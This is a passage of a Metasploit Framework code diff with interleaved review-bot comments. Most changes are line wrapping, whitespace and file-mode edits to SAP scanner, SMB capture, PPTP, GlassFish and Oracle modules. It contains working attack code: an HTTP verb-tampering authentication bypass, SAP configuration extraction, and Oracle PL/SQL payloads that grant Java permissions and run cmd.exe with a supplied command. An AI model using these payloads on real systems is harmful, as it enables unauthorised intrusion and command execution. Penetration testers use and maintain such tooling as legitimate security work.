- OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
- OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
+ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
+ OptPath.new('USER_FILE', [ false, "File containing users, one per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
+ OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
+ File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
 ], self.class)
 deregister_options('SQL') 
diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb 
index b62f0fb723..eefefb3b19 100644 
--- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb 
+++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb 
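Review bot: The re-wrapped USERPASS_FILE option still carries the typo `(space-seperated)` in its description, which is the operator-visible text for the option; since the line is rewritten anyway, the first added line should read `OptPath.new('USERPASS_FILE', [ false, "File containing (space-separated) users and passwords, one pair per line",`. The isqlplus_login.rb hunk in the same commit spells the equivalent description correctly, so this is the only place to fix. The register_options call is presumably inside an initialize method that starts before this hunk.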
@@ -1,157 +1,157 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'rex/proto/http' -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SAP URL Scanner', - 'Description' => %q{ - This module scans for commonly found SAP Internet Communication Manager URLs - and outputs return codes for the user. - }, - 'Version' => '$Revision$', - 'Author' => [ 'Chris John Riley' ], - 'References' => - [ - [ 'CVE', '2010-0738' ] # VERB auth bypass - ], - 'License' => MSF_LICENSE - )) - - register_options( - [ - OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), - OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) - ], self.class) - end - - # Base Structure of module borrowed from jboss_vulnscan - def run_host(ip) - # If URLFILE is set empty, obviously the user made a silly mistake - if datastore['URLFILE'].empty? 
- print_error("Please specify a URLFILE") - return - end - - # Initialize the actual URLFILE path - if datastore['URLFILE'] == "sap_icm_paths.txt" - url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" - else - # Not the default sap_icm_paths file - url_file = datastore['URLFILE'] - end - - # If URLFILE path doesn't exist, no point to continue the rest of the script - if not File.exists?(url_file) - print_error("Required URL list #{url_file} was not found") - return - end - - res = send_request_cgi( - { - 'uri' => "/" + Rex::Text.rand_text_alpha(12), - 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) - - if res - print_status("Note: Please note these URLs may or may not be of interest based on server configuration") - @info = [] - if not res.headers['Server'].nil? - @info << res.headers['Server'] - print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") - else - print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") - end - - if (res.body and /class="note">(.*)code:(.*) url, - 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) - - if (res) - if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? 
- print_good("New server header seen [#{res.headers['Server']}]") - @info << res.headers['Server'] #Add To seen server headers - end - - case - when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") - when res.code == 403 - print_good("#{rhost}:#{rport} #{url} - restricted (403)") - when res.code == 401 - print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") - # Attempt verb tampering bypass - bypass_auth(url) - when res.code == 404 - # Do not return by default, only display in verbose mode - vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") - when res.code == 500 - print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") - when res.code == 301, res.code == 302 - print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") - else - print_status("#{rhost}:#{rport} - unhandle response code #{res.code}") - end - - else - print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") - end - end - - def bypass_auth(url) - print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") - - res = send_request_raw({ - 'uri' => url, - 'method' => datastore['VERB'], - 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason - }, 20) - - if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") - else - print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") - end - end -end +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. 
+# http://metasploit.com/framework/ +## + +require 'rex/proto/http' +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SAP URL Scanner', + 'Description' => %q{ + This module scans for commonly found SAP Internet Communication Manager URLs + and outputs return codes for the user. + }, + 'Version' => '$Revision$', + 'Author' => [ 'Chris John Riley' ], + 'References' => + [ + [ 'CVE', '2010-0738' ] # VERB auth bypass + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), + OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) + ], self.class) + end + + # Base Structure of module borrowed from jboss_vulnscan + def run_host(ip) + # If URLFILE is set empty, obviously the user made a silly mistake + if datastore['URLFILE'].empty? + print_error("Please specify a URLFILE") + return + end + + # Initialize the actual URLFILE path + if datastore['URLFILE'] == "sap_icm_paths.txt" + url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" + else + # Not the default sap_icm_paths file + url_file = datastore['URLFILE'] + end + + # If URLFILE path doesn't exist, no point to continue the rest of the script + if not File.exists?(url_file) + print_error("Required URL list #{url_file} was not found") + return + end + + res = send_request_cgi( + { + 'uri' => "/" + Rex::Text.rand_text_alpha(12), + 'method' => 'GET', + 'ctype' => 'text/plain', + }, 20) + + if res + print_status("Note: Please note these URLs may or may not be of interest based on server configuration") + @info = [] + if not res.headers['Server'].nil? 
+ @info << res.headers['Server'] + print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") + else + print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") + end + + if (res.body and /class="note">(.*)code:(.*) url, + 'method' => 'GET', + 'ctype' => 'text/plain', + }, 20) + + if (res) + if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? + print_good("New server header seen [#{res.headers['Server']}]") + @info << res.headers['Server'] #Add To seen server headers + end + + case + when res.code == 200 + print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") + when res.code == 403 + print_good("#{rhost}:#{rport} #{url} - restricted (403)") + when res.code == 401 + print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") + # Attempt verb tampering bypass + bypass_auth(url) + when res.code == 404 + # Do not return by default, only display in verbose mode + vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") + when res.code == 500 + print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") + when res.code == 301, res.code == 302 + print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") + else + print_status("#{rhost}:#{rport} - unhandle response code #{res.code}") + end + + else + print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") + end + end + + def bypass_auth(url) + print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") + + res = send_request_raw({ + 'uri' => url, + 'method' => datastore['VERB'], + 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason + }, 20) + + if (res and res.code == 200) + print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") + else + print_status("#{rhost}:#{rport} Could not get 
authentication bypass via HTTP verb tampering") + end + end +end diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index c6d06dfd43..c0c9b600f0 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb 
@@ -1,192 +1,192 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit4 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner - - def initialize - super( - 'Name' => 'SAP Management Console Get Process Parameters', - 'Version' => '$Revision$', - 'Description' => %q{ - This module simply attempts to output a SAP process parameters and - configuration settings through the SAP Management Console SOAP Interface. - }, - 'References' => - [ - # General - [ 'URL', 'http://blog.c22.cc' ] - ], - 'Author' => [ 'Chris John Riley' ], - 'License' => MSF_LICENSE - ) - - register_options( - [ - Opt::RPORT(50013), - OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), - OptString.new('MATCH', [false, 'Display matches e.g login/', '']), - ], self.class) - register_autofilter_ports([ 50013 ]) - deregister_options('RHOST') - end - - def rport - datastore['RPORT'] - end - - def run_host(ip) - res = send_request_cgi({ - 'uri' => "/#{datastore['URI']}", - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } - }, 25) - - if not res - print_error("#{rhost}:#{rport} [SAP] Unable to connect") - return - end - - getprocparam(ip) - end - - def getprocparam(rhost) - verbose = datastore['VERBOSE'] - print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}") - success = false - soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' - xsi = 'http://www.w3.org/2001/XMLSchema-instance' - xs = 'http://www.w3.org/2001/XMLSchema' - sapsess = 'http://www.sap.com/webas/630/soap/features/session/' - ns1 = 'ns1:GetProcessParameter' - - data = '' + "\r\n" - data << '' + "\r\n" - 
data << '' + "\r\n" - data << '' + "\r\n" - data << 'true' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n" - data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl">' + "\r\n" - data << '' + "\r\n" - data << '' + "\r\n\r\n" - - begin - res = send_request_raw({ - 'uri' => "/#{datastore['URI']}", - 'method' => 'POST', - 'data' => data, - 'headers' => - { - 'Content-Length' => data.length, - 'SOAPAction' => '""', - 'Content-Type' => 'text/xml; charset=UTF-8', - } - }, 30) - - if not res - print_error("#{rhost}:#{rport} [SAP] Unable to connect") - return - end - - if res.code == 200 - case res.body - when nil - # Nothing - when /(.*)<\/parameter>/i - body = [] - body = res.body - success = true - end - elsif res.code == 500 - case res.body - when /(.*)<\/faultstring>/i - faultcode = $1.strip - fault = true - end - else - print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.") - end - - rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication") - return - end - - if success - #Only stoor loot if MATCH is not selected - if datastore['MATCH'].empty? 
- print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot") - store_loot( - "sap.getprocessparameters", - "text/xml", - rhost, - res.body, - ".xml" - ) - else - name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n']) - print_status("[SAP] Regex match selected, skipping loot storage") - print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}") - - saptbl = Msf::Ui::Console::Table.new( - Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] Process Parameters", - 'Prefix' => "\n", - 'Indent' => 1, - 'Columns' => - [ - "Name", - "Description", - "Value" - ]) - - xmldata = REXML::Document.new(body) - xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/' - xmlpath << '/SAPControl:GetProcessParameterResponse' - xmlpath << '/parameter/item' - xmldata.elements.each(xmlpath) do | ele | - if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/) - name = ele.elements["name"].text if not ele.elements["name"].nil? - desc = ele.elements["description"].text if not ele.elements["description"].nil? - desc = '' if desc.nil? - val = ele.elements["value"].text if not ele.elements["value"].nil? - val = '' if val.nil? - saptbl << [ name, desc, val ] - end - end - - print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty? - end - - return - - elsif fault - print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") - return - - else - # Something has gone horribly wrong - print_error("#{rhost}:#{rport} [SAP] failed to request environment") - return - end - end -end +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. 
+# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'SAP Management Console Get Process Parameters', + 'Version' => '$Revision$', + 'Description' => %q{ + This module simply attempts to output a SAP process parameters and + configuration settings through the SAP Management Console SOAP Interface. + }, + 'References' => + [ + # General + [ 'URL', 'http://blog.c22.cc' ] + ], + 'Author' => [ 'Chris John Riley' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(50013), + OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), + OptString.new('MATCH', [false, 'Display matches e.g login/', '']), + ], self.class) + register_autofilter_ports([ 50013 ]) + deregister_options('RHOST') + end + + def rport + datastore['RPORT'] + end + + def run_host(ip) + res = send_request_cgi({ + 'uri' => "/#{datastore['URI']}", + 'method' => 'GET', + 'headers' => + { + 'User-Agent' => datastore['UserAgent'] + } + }, 25) + + if not res + print_error("#{rhost}:#{rport} [SAP] Unable to connect") + return + end + + getprocparam(ip) + end + + def getprocparam(rhost) + verbose = datastore['VERBOSE'] + print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}") + success = false + soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' + xsi = 'http://www.w3.org/2001/XMLSchema-instance' + xs = 'http://www.w3.org/2001/XMLSchema' + sapsess = 'http://www.sap.com/webas/630/soap/features/session/' + ns1 = 'ns1:GetProcessParameter' + + data = '' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << 'true' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n" + data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl">' + "\r\n" + data << '' + "\r\n" + data << '' + "\r\n\r\n" + + begin + res = 
send_request_raw({ + 'uri' => "/#{datastore['URI']}", + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Length' => data.length, + 'SOAPAction' => '""', + 'Content-Type' => 'text/xml; charset=UTF-8', + } + }, 30) + + if not res + print_error("#{rhost}:#{rport} [SAP] Unable to connect") + return + end + + if res.code == 200 + case res.body + when nil + # Nothing + when /(.*)<\/parameter>/i + body = [] + body = res.body + success = true + end + elsif res.code == 500 + case res.body + when /(.*)<\/faultstring>/i + faultcode = $1.strip + fault = true + end + else + print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.") + end + + rescue ::Rex::ConnectionError + print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication") + return + end + + if success + #Only stoor loot if MATCH is not selected + if datastore['MATCH'].empty? + print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot") + store_loot( + "sap.getprocessparameters", + "text/xml", + rhost, + res.body, + ".xml" + ) + else + name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n']) + print_status("[SAP] Regex match selected, skipping loot storage") + print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}") + + saptbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "[SAP] Process Parameters", + 'Prefix' => "\n", + 'Indent' => 1, + 'Columns' => + [ + "Name", + "Description", + "Value" + ]) + + xmldata = REXML::Document.new(body) + xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/' + xmlpath << '/SAPControl:GetProcessParameterResponse' + xmlpath << '/parameter/item' + xmldata.elements.each(xmlpath) do | ele | + if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/) + name = ele.elements["name"].text if not ele.elements["name"].nil? + desc = ele.elements["description"].text if not ele.elements["description"].nil? 
+ desc = '' if desc.nil? + val = ele.elements["value"].text if not ele.elements["value"].nil? + val = '' if val.nil? + saptbl << [ name, desc, val ] + end + end + + print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty? + end + + return + + elsif fault + print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") + return + + else + # Something has gone horribly wrong + print_error("#{rhost}:#{rport} [SAP] failed to request environment") + return + end + end +end diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 3ab038150b..86cf307d55 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -1,5 +1,5 @@ ## -# $Id: call_scanner.rb 13183 2011-07-15 15:33:35Z egypt $ +# $Id$ ## ## 
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
 def initialize
 super(
 'Name' => 'Telephone Line Voice Scanner',
- 'Version' => '$Revision: 13183 $',
+ 'Version' => '$Revision$',
 'Description' => 'This module dials a range of phone numbers and records audio from each answered call',
 'Author' => [ 'hdm' ],
 'License' => MSF_LICENSE,
diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb
index 2bea9bc9a2..cbe352e33b 100644
--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -61,10 +61,12 @@ class Metasploit3 < Msf::Auxiliary register_advanced_options( [ - OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]), - OptBool.new("NTLM_UseNTLM2_session", [ true, "activate the 'Negotiate NTLM2 key' flag in ntlm authentification when smb extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]), - OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send an gss_security blob in smb_negociate response when smb extended security is set, when this flag is not set windows will respond without gss encapsulation, ubuntu will still use gss", true ]), - OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ]) + OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]), + OptBool.new("NTLM_UseNTLM2_session", [ true, "Activate the 'negociate NTLM2 key' flag in NTLM authentication. " + + "When SMB extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]), + OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send a gss_security blob in smb_negociate response when SMB extended security is set. " + + "When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss.", true ]), + OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ]) ], self.class) end diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index b0cf03537c..cbef363e21 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb 
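Review bot: The rewritten option descriptions still carry the misspellings "negociation", "negociate" and "authentification" even though every one of these lines was touched, so the user-facing `show options` text stays wrong after the reflow. The option names (`USE_GSS_NEGOCIATION`, `SMB_EXTENDED_SECURITY`) are an interface and should stay as they are, but the prose can be corrected without affecting callers, e.g. the first description becoming `"Use SMB extended security negotiation; when set, the client will use NTLMSSP, otherwise classic LANMAN authentication"`. The same applies to the NTLM2 and GSS descriptions in this hunk ("negotiate NTLM2 key", "SMB extended security negotiation"). The enclosing `initialize` starts outside the hunk.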
+++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary - e - print_error("AIRPWN: failed to parse response file " \ + print_error("AIRPWN: failed to parse response file " + "#{r['file']}, #{e.class} #{e} #{e.backtrace}") end end else if r["file"] then - print_error "AIRPWN: Both 'response' and 'file' in yaml config, " \ - "defaulting to 'response'" + print_error "AIRPWN: Both 'response' and 'file' in yaml config, " + + "defaulting to 'response'" end r["txresponse"] = r["response"] diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index 985a8ea101..b0ec19f104 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb 
@@ -47,10 +47,16 @@ class Metasploit3 < Msf::Auxiliary name = Rex::Text.rand_text_alpha(rand(10) + 1) - package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','" - package1 << "<" << ">','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" - package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" - package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','" + package1 << "<" << ">','execute','ENABLED' from dual;" + + "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;" + + "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" + package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" + + "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;" + + "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;" os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual" 
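Review bot: The rewritten `package1 <<` statement mixes `<<` and `+` in a single expression (`package1 << "<" << "…from dual;" + "BEGIN …END;"`), as far as the collapsed line shows; it only produces the intended string because `+` binds tighter than `<<`, which is easy to misread as two separate appends. Continuing the chain with `<<` for the second fragment, `package1 << "…from dual;"` followed by `package1 << "BEGIN OPEN C1;…END;"`, or building the whole value with `+` on every line as `package2`/`package3` now do, says the same thing without relying on operator precedence. The enclosing method starts and ends outside the hunk.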
diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index b039d46be5..118495af8a 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary def create_page # Webpage Title title = "vSploit PII Webserver" - sheep =< --------- @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary // ( // / ~~~~~ ~~~~ -EOF +EOS page = "" page << "\n\n" diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 35f159ca95..da0bdf2b0e 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb 
@@ -79,7 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote [ OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]), OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]), - OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), + OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. " + + "ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " + + "If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " + + "(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]), OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]), ], self.class) diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb old mode 100755 new mode 100644 index 8b8111a227..d381b8681c --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb 
@@ -291,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request(path, @verbs['POST'], session, data, ctype) if (not res) print_error("Undeployment failed on #{path} - No Response") - else + else if res.code < 200 or res.code >= 300 print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}") end @@ -333,10 +333,10 @@ class Metasploit3 < Msf::Exploit::Remote end # - # Return the formatted version of the POST data - # - def format_2_x_war(boundary,name,value=nil, war=nil) - data = '' + # Return the formatted version of the POST data + # + def format_2_x_war(boundary,name,value=nil, war=nil) + data = '' data << boundary data << "\r\nContent-Disposition: form-data; name=\"form:title:sheet1:section1:prop1:fileupload\"; " @@ -344,8 +344,8 @@ class Metasploit3 < Msf::Exploit::Remote data << war data << "\r\n" - return data - end + return data + end # # Return the formatted version of the POST data @@ -555,8 +555,8 @@ class Metasploit3 < Msf::Exploit::Remote ctype = "multipart/form-data; boundary=#{boundary}" elsif version == '2.x' or version == '9.x' ctype = "multipart/form-data; boundary=---------------------------#{boundary}" - typefield = '' - start = '' + typefield = '' + start = '' else ctype = "multipart/form-data; boundary=---------------------------#{boundary}" end @@ -687,7 +687,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.code.to_i 